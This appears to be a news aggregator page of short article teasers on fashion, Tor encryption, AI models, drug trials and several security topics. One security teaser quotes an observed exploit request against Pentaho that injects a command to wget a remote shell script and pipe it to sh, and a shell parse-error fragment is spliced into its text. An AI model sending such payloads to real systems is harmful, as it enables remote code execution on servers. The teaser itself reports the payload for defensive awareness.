NYFW: Khaite, Todd Snyder, Area, and Altuzarra
Published September 14, 2025 Despite all the gloom mongering one can read about New York…
Counter Galois Onion: Improved encryption for Tor circuit traffic
It’s always a good day when we can talk about cryptography. Especially when we are sunsetting one of the oldest and most important encryption algorithms in Tor and replacing it with a research-backed new design, called Counter Galois Onion. This overhaul will defend users against a broader class of online attackers (described below), and form…
Claude Opus 4.5 now in Amazon Bedrock
Anthropic’s newest foundation model, Claude Opus 4.5, is now available in Amazon Bedrock, a fully managed service that offers a choice of high-performing foundation models from leading AI companies. Opus 4.5 is a meaningful step forward in what AI systems can do and sets a new standard across coding, agents, computer use, and office tasks….
Zero-Day Zero: The AI Attack That Just Ended the Era of the Forgiving Internet
Why the Exploit Window Has Collapsed and How CISOs Must Pivot to Survive For decades, cybersecurity was a game of time. We banked on the buffer between a vulnerability’s disclosure and its widespread exploitation. We relied on the forgiving internet, where human attackers needed days or weeks to weaponize code, giving us breathing room to…
What’s next for AlphaFold: A conversation with a Google DeepMind Nobel laureate
Still, Verba’s team uses AlphaFold (both 2 and 3, because they have different strengths, he says) to run virtual versions of their experiments before running them in the lab. Using AlphaFold’s results, they can narrow down the focus of an experiment—or decide that it’s not worth doing. It can really save time, he says: “It…
From Vision to Value: Gartner® Identifies Qualys as 2025 Magic Quadrant™ Leader in Exposure Assessment Platforms
Why Was Qualys Named a Leader in Exposure Assessment Platforms? We’re proud to share that Qualys has been named a Leader in the 2025 Gartner® Magic Quadrant™ for Exposure Assessment Platforms. We believe this recognition reflects our forward-thinking vision and the proven value of the Qualys Enterprise TruRisk Platform in helping organizations manage cyber risk….
Deploy GPT-OSS models with Amazon Bedrock Custom Model Import
Amazon Bedrock Custom Model Import now supports OpenAI models with open weights, including GPT-OSS variants with 20-billion and 120-billion parameters. GPT-OSS models offer reasoning capabilities and can be used with OpenAI Chat Completions API. By preserving full OpenAI API compatibility, organizations can migrate their existing applications to AWS, gaining enterprise-grade security, scaling, and cost control….
Obesity drug semaglutide fails to slow Alzheimer’s
Drug maker Novo Nordisk says semaglutide, the active ingredient for the weight loss jab Wegovy, does not slow Alzheimer’s – despite initial hopes that it might help against dementia. Researchers began two large trials involving more than 3,800 people after reports the medicine was having an impact in the real world. But the studies showed…
The State of AI: Chatbot companions and the future of our privacy
Eileen Guo writes: Even if you don’t have an AI friend yourself, you probably know someone who does. A recent study found that one of the top uses of generative AI is companionship: On platforms like Character.AI, Replika, or Meta AI, people can create personalized chatbots to pose as the ideal friend, romantic partner, parent,…
Conflicts between URL mapping and URL based access control.
We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or “aliases”) interac\|zsh:1: parse error near `&’ ts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today: /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec(‘wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh’)%7D&mgrDn=a&pwd=a This request attempts to exploit a vulnerability…
Amazon Is Using Specialized AI Agents for Deep Bug Hunting
As generative AI pushes the speed of software development, it is also enhancing the ability of digital attackers to carry out financially motivated or state-backed hacks. This means that security teams at tech companies have more code than ever to review while dealing with even more pressure from bad actors. On Monday, Amazon will publish…
